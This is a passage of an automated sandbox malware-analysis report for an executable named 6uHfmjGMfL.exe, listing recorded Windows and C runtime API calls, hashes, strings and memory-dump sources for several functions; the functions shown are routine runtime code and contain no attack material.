                • Instruction ID: d51b78a00c420fa46cfa3dbe5a7b8c36eb3f0e13ee8f3008e062bf219e116855
                • Opcode Fuzzy Hash: d18512388ffd342288df39428cbfcd5e8d75cc57469327d656fa976045054efc
                • Instruction Fuzzy Hash: 2EF036352002A5BBCB205FA7DC08D96FF69FF457A03044511F919C7121D731EA60D7E0
                APIs
                • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000), ref: 00CF7361
                • GetLastError.KERNEL32(?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?,00000000,?,00CE7EE2,8B18EC83), ref: 00CF736D
                  • Part of subcall function 00CF7333: CloseHandle.KERNEL32(FFFFFFFE,00CF737D,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?,00000000), ref: 00CF7343
                • ___initconout.LIBCMT ref: 00CF737D
                  • Part of subcall function 00CF72F5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CF7324,00CF3E1F,00000000,?,00CE7996,?,?,00000000,?), ref: 00CF7308
                • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?), ref: 00CF7392
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 9c3f41f801d97bf94589b487d7a6a9744789d15a2d377cecf9182c2b35add1e6
                • Instruction ID: 144d39f119c24ec60373f24ca54f17d4999793d472df9d3e3459a4497f8b2c6f
                • Opcode Fuzzy Hash: 9c3f41f801d97bf94589b487d7a6a9744789d15a2d377cecf9182c2b35add1e6
                • Instruction Fuzzy Hash: E7F0A23A50525ABBCF622F95DD05ADD3F67EB04361B044114FE5CD5630DA319920EBA1
                APIs
                • SleepConditionVariableCS.KERNEL32(?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99DD
                • LeaveCriticalSection.KERNEL32(00D18FA8,00D1CDC0,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99E7
                • WaitForSingleObjectEx.KERNEL32(00D1CDC0,00000000,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99F8
                • EnterCriticalSection.KERNEL32(00D18FA8,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99FF
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                • String ID:
                • API String ID: 3269011525-0
                • Opcode ID: 9d1688536b689691f133a7e7a499cb437eda191e2c9c89c12b001a99de4dda66
                • Instruction ID: d43fd289006390770f23d8097bd8c34efd9563dae56b529508e25dfa95a021b7
                • Opcode Fuzzy Hash: 9d1688536b689691f133a7e7a499cb437eda191e2c9c89c12b001a99de4dda66
                • Instruction Fuzzy Hash: E0E0ED3A545324BBCA115B51FC09BCD3A16EF49762B004015F60DA6360CF715952ABF5
                APIs
                • _free.LIBCMT ref: 00CE4562
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CE4575
                • _free.LIBCMT ref: 00CE4586
                • _free.LIBCMT ref: 00CE4597
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 08b29436397338af15c9246a9b3f74d6742caca6b751468188a041b8f6077fad
                • Instruction ID: e39d6aac4883efba92e8270ceb1d33967ffbc39f2e06efd5ea403067257e2201
                • Opcode Fuzzy Hash: 08b29436397338af15c9246a9b3f74d6742caca6b751468188a041b8f6077fad
                • Instruction Fuzzy Hash: 07E09AB5C15360BE8A216F26AC318C5BA22A748750301940AF41DA6331DF39055BBFB6
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00CE334D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: 60784d5d9b464b55a2784300eb4513a4e98c8bbf8f81a11675abdac8ec91044e
                • Instruction ID: 97b66fdefcab376c2c770eaa40d6d251b7ab0252693035ef7a5d99f8eafd60db
                • Opcode Fuzzy Hash: 60784d5d9b464b55a2784300eb4513a4e98c8bbf8f81a11675abdac8ec91044e
                • Instruction Fuzzy Hash: 9051AF60A082C196CB02B717D90977E6BA0EB00750F204D59E4E6873FDDF749FC6AA56
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user\Desktop\6uHfmjGMfL.exe
                • API String ID: 0-3138345258
                • Opcode ID: 82bd7be94f5c56891264cbc1d7abbac31d8c404bffd6579dbd35258a6a9117ab
                • Instruction ID: 7134738970c6a9f522897db42ffc66519a0681502a8142abc2ea02f3abdc81db
                • Opcode Fuzzy Hash: 82bd7be94f5c56891264cbc1d7abbac31d8c404bffd6579dbd35258a6a9117ab
                • Instruction Fuzzy Hash: D041A471A002D4AFDB21DF9BDC869AEBBB8EB84700F144076E455D7201DB70AB81EB60
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CDCF41
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: db210e72e8ae882c8f51a54875681ce104f465aa3ff1818839b691b29cbf48ea
                • Instruction ID: 210d64321b70a6df7e1ee06355b5a5c2a9c97ddf0d771474fdbf8d36dcaca6fd
                • Opcode Fuzzy Hash: db210e72e8ae882c8f51a54875681ce104f465aa3ff1818839b691b29cbf48ea
                • Instruction Fuzzy Hash: 5E416871D00209AFCF16DFA8CC81EEEBBB5BF88300F19805AFA15A7251D335AA51DB50
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB44EB
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB453A
                  • Part of subcall function 00CD879E: _Yarn.LIBCPMT ref: 00CD87BD
                  • Part of subcall function 00CD879E: _Yarn.LIBCPMT ref: 00CD87E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                • String ID: bad locale name
                • API String ID: 1908188788-1405518554
                • Opcode ID: cda2a8bf88f1b6c0863a39f5cacea07638e0ea8400bf9fd3126d174f7c0d3b1d
                • Instruction ID: ca5052bffa505d5e1be2dab6b2bed194364ef801237f4b0c4fe7d8df60bf45ff
                • Opcode Fuzzy Hash: cda2a8bf88f1b6c0863a39f5cacea07638e0ea8400bf9fd3126d174f7c0d3b1d
                • Instruction Fuzzy Hash: 1A11A071505B84AFD320CF68C901757BBF4EF19710F008A1EE49AC7B81E7B5AA08CBA5